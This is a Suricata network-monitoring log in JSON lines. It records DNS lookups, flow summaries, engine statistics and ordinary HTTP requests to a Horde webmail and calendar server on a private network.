{"timestamp":"2020-02-29T00:15:50.330124+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47730,"proto":"UDP","dns":{"type":"answer","id":24645,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:50.404112+0000","flow_id":623112466345782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34846,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7753}} {"timestamp":"2020-02-29T00:15:51.000352+0000","flow_id":1428599203355264,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.1","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:10:50.449152+0000","end":"2020-02-29T00:10:50.451079+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:52.000623+0000","flow_id":1918758066486106,"event_type":"flow","src_ip":"192.168.10.130","src_port":34834,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4820,"start":"2020-02-29T00:14:46.031578+0000","end":"2020-02-29T00:14:51.218164+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:15:52.475712+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35574,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42047,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:52.580812+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35574,"proto":"UDP","dns":{"type":"answer","id":42047,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:52.580812+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35574,"proto":"UDP","dns":{"type":"answer","id":42047,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:52.619485+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99}} {"timestamp":"2020-02-29T00:15:52.619485+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:15:54.000393+0000","event_type":"stats","stats":{"uptime":14606,"capture":{"kernel_packets":136002,"kernel_drops":0},"decoder":{"pkts":136021,"bytes":93587551,"invalid":188,"ipv4":134506,"ipv6":8,"ethernet":136021,"raw":0,"null":0,"sll":0,"tcp":129137,"udp":5166,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2790,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2806,"synack":2797,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1829,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2362,"failed_udp":112},"tx":{"http":4693,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2442}},"flow_mgr":{"closed_pruned":2771,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":4,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65528,"rows_empty":3,"rows_busy":0,"rows_maxlen"
:1},"dns":{"memuse":22479,"memcap_state":0,"memcap_global":0},"http":{"memuse":92914,"memcap":0}}} {"timestamp":"2020-02-29T00:15:55.000509+0000","flow_id":30355435553035,"event_type":"flow","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":2866,"bytes_toclient":7700,"start":"2020-02-29T00:14:44.196875+0000","end":"2020-02-29T00:14:54.542150+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:55.405021+0000","flow_id":623112466345782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34846,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7753},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":26692,"tx_id":0}} {"timestamp":"2020-02-29T00:15:57.624359+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34848,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":96,"tx_id":0}} {"timestamp":"2020-02-29T00:16:01.000196+0000","event_type":"stats","stats":{"uptime":14613,"capture":{"kernel_packets":136038,"kernel_drops":0},"decoder":{"pkts":136039,"bytes":93589986,"invalid":188,"ipv4":134524,"ipv6":8,"ethernet":136039,"raw":0,"null":0,"sll":0,"tcp":129153,"udp":5168,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2791,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2807,"synack":2798,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1830,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2363,"failed_udp":112},"tx":{"http":4694,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2443}},"flow_mgr":{"closed_pruned":2773,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22479,"memcap_state":0,"memcap_g
lobal":0},"http":{"memuse":24177,"memcap":0}}} {"timestamp":"2020-02-29T00:16:03.000121+0000","flow_id":1847126602345263,"event_type":"flow","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":24,"pkts_toclient":25,"bytes_toserver":2616,"bytes_toclient":28174,"start":"2020-02-29T00:14:52.715567+0000","end":"2020-02-29T00:15:01.606362+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:03.979541+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60926,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15141,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:04.086107+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60926,"proto":"UDP","dns":{"type":"answer","id":15141,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:04.086107+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60926,"proto":"UDP","dns":{"type":"answer","id":15141,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:04.218436+0000","flow_id":544162378397647,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8820}} {"timestamp":"2020-02-29T00:16:08.000247+0000","event_type":"stats","stats":{"uptime":14620,"capture":{"kernel_packets":136044,"kernel_drops":0},"decoder":{"pkts":136059,"bytes":93601097,"invalid":188,"ipv4":134544,"ipv6":8,"ethernet":136059,"raw":0,"null":0,"sll":0,"tcp":129171,"udp":5170,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2792,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2808,"synack":2799,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1831,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2364,"failed_udp":112},"tx":{"http":4695,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2444}},"flow_mgr":{"closed_pruned":2774,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22809,"memcap_state":0,"memcap_global":0},"http":{"memuse":109686,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:09.219329+0000","flow_id":544162378397647,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8820},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":36778,"tx_id":0}} {"timestamp":"2020-02-29T00:16:10.000881+0000","flow_id":512302305152088,"event_type":"flow","src_ip":"192.168.10.130","src_port":34830,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":2179,"bytes_toclient":9824,"start":"2020-02-29T00:14:34.691288+0000","end":"2020-02-29T00:15:09.176468+0000","age":35,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:13.650442+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58932,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29509,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:13.758493+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58932,"proto":"UDP","dns":{"type":"answer","id":29509,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:16:13.758493+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58932,"proto":"UDP","dns":{"type":"answer","id":29509,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:13.789852+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:16:13.789852+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} 
{"timestamp":"2020-02-29T00:16:14.000386+0000","flow_id":480231771154811,"event_type":"flow","src_ip":"192.168.10.122","src_port":34716,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:13.403835+0000","end":"2020-02-29T00:11:13.512776+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:15.000325+0000","event_type":"stats","stats":{"uptime":14627,"capture":{"kernel_packets":136059,"kernel_drops":0},"decoder":{"pkts":136062,"bytes":93601295,"invalid":188,"ipv4":134547,"ipv6":8,"ethernet":136062,"raw":0,"null":0,"sll":0,"tcp":129174,"udp":5170,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2792,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2808,"synack":2799,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1831,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2364,"failed_udp":112},"tx":{"http":4695,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2444}},"flow_mgr":{"closed_pruned":2775,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":
65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22810,"memcap_state":0,"memcap_global":0},"http":{"memuse":39762,"memcap":0}}} {"timestamp":"2020-02-29T00:16:15.001120+0000","flow_id":422730764433898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1875,"bytes_toclient":5458,"start":"2020-02-29T00:15:08.702954+0000","end":"2020-02-29T00:15:14.111373+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:17.582541+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3528,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:17.690881+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59430,"proto":"UDP","dns":{"type":"answer","id":3528,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:17.690881+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59430,"proto":"UDP","dns":{"type":"answer","id":3528,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:16:17.721778+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37}} {"timestamp":"2020-02-29T00:16:17.721778+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":6,"tx_id":0}} {"timestamp":"2020-02-29T00:16:18.794784+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34850,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:16:19.000874+0000","flow_id":1941895041657687,"event_type":"flow","src_ip":"192.168.10.122","src_port":54337,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:18.863063+0000","end":"2020-02-29T00:11:18.971428+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:20.000316+0000","flow_id":316799676049850,"event_type":"flow","src_ip":"192.168.10.122","src_port":46411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:19.256442+0000","end":"2020-02-29T00:11:19.364994+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:20.105331+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57167,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52826,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:20.214280+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57167,"proto":"UDP","dns":{"type":"answer","id":52826,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:16:20.214280+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57167,"proto":"UDP","dns":{"type":"answer","id":52826,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:20.332072+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306}} {"timestamp":"2020-02-29T00:16:20.332072+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/saveEvent","state":"CLOSED","stored":false,"size":923,"tx_id":0}} 
